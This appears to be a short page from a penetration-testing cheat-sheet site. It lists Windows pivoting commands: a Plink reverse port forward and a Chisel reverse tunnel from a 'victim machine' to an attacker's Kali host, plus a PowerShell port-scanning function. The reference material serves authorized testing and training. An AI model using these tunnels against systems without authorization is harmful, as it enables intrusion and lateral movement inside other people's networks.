pwny.cc
  • Home
  • SO
    • AI
      • Evasion
        • Exercise 1
        • Exercise 2
        • Exercise 3
        • Exercise 4
    • Android
      • adb
      • apktool
      • burp suite
      • dns spoofing
      • frida
      • intent
      • jadx
      • JNI
      • objection
      • tcpdump
      • webview
    • iOS
      • objection
    • Linux
      • Internal Recon
      • Bypasses
      • Network
      • Exfiltration
      • Containers
      • Iptables
    • Windows
      • Internal Recon
      • External Recon
      • Bypasses
      • Network
      • Exfiltration
  • SHELLS
    • Misc
    • Web Shells
    • Reverse Shells
    • Obfuscated Shells
  • WEB ATTACKS
    • Misc
    • Command Injection
    • Cross-Site Scripting (XSS)
      • XSS Tips
      • WAF Bypasses
    • Insecure Direct Object Reference (IDOR)
    • Insecure File Upload
    • Local File Inclusion (LFI)
      • Bypass Techniques
      • LFI to RCE
    • OAuth
    • Open Redirect
      • Open Redirect to XSS
    • Server Side Request Forgery (SSRF)
    • Server Side Template Injection (SSTI)
    • SQL Injection (SQLi)
      • SQLMap
      • MySQL
      • MSSQL
      • Oracle
      • PostgreSQL
    • XML External Entity (XXE)
  • OTHER
    • Cracking
      • Hashcat
      • John the Ripper
    • Sandbox Escape
Powered by GitBook
On this page
  • Plink Port Forwarding
  • Chisel TCP tunnel over HTTP
  • Scan ports from Powershell

Was this helpful?

  1. SO
  2. Windows

Network

PreviousBypassesNextExfiltration

Last updated 3 years ago

Was this helpful?

Plink Port Forwarding

#10.10.10.19 == kali_IP. 8888 == Port to redirect.
.\plink.exe -l root -pw toor 10.10.10.19 -N -R 8888:127.0.0.1:8888

Chisel TCP tunnel over HTTP

#Download chisel for victim machine version
#10.10.10.19 == kali_IP. 4506 == Port to redirect.
.\chisel client 10.10.10.19:10000 R:4506:127.0.0.1:4506 //In Victim Machine
.\chisel server -p 10000 --reverse //In Kali Machine

Scan ports from Powershell

function Test-Port {
$computer=Read-Host "[*] IP Address:"
$port=Read-Host "[*] Port Numbers (separate them by comma):"
$port.split(',') | Foreach-Object -Process {If (($a=Test-NetConnection $computer -Port $_ -WarningAction SilentlyContinue).tcpTestSucceeded -eq $true) {Write-Host $a.Computername $a.RemotePort -ForegroundColor Green -Separator " ==> "} else {Write-Host $a.Computername $a.RemotePort -Separator " ==> " -ForegroundColor Red}}
}
https://the.earth.li/~sgtatham/putty/latest/w32/plink.exe
Plink - Windows 32bits download
Releases · jpillora/chiselGitHub
Chisel - Releases
Logo